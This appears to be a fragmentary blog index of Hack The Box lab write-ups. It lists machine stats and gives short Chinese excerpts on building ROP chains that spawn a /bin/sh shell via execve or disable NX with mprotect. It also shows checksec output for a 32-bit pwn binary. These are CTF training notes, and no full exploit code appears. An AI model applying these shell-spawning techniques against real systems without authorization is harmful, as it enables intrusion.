introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 30 Oct 2021
IP: 10.10.11.120

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 16 Oct 2021
IP: 10.10.11.118

introduce

OS: Windows
Difficulty: Easy
Points: 20
Release: 02 Oct 2021
IP: 10.10.11.106

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 25 Sep 2021
IP: 10.10.11.114

为了用sys_execve syscall执行/bin/sh，需要解决一些障碍，根据参考，需要设置寄存器如下;

EAX = 11 (or 0x0B in hex) – The execve syscall number
EBX = Address in memory of the string “/bin/sh”
ECX = Address of a pointer to the string “/bin/sh”
EDX = Null (可选的指向描述环境的结构的指针)

一旦所有这些都设置好了，执行int 0x80指令应该会生成一个shell。

基于上个ROP exploit建立的,学习编写ROP chains的另一种方法, 而不是using sys_execve to spawn a shell, 用sys_mprotect关掉NX保护, 并执行shellcode。

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 11 Sep 2021
IP: 10.10.11.111

详细过程及exp

1. Basic checks:

1
2
3
4
5
6
7
8
9
10
11

┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy]
└─# file little_tommy
little_tommy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=861838865726f48aa954b8df920d1be3ae683b40, not stripped
┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy]
└─# checksec little_tommy
[*] '/root/hackthebox/challenge/pwn/little_tommy/little_tommy'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)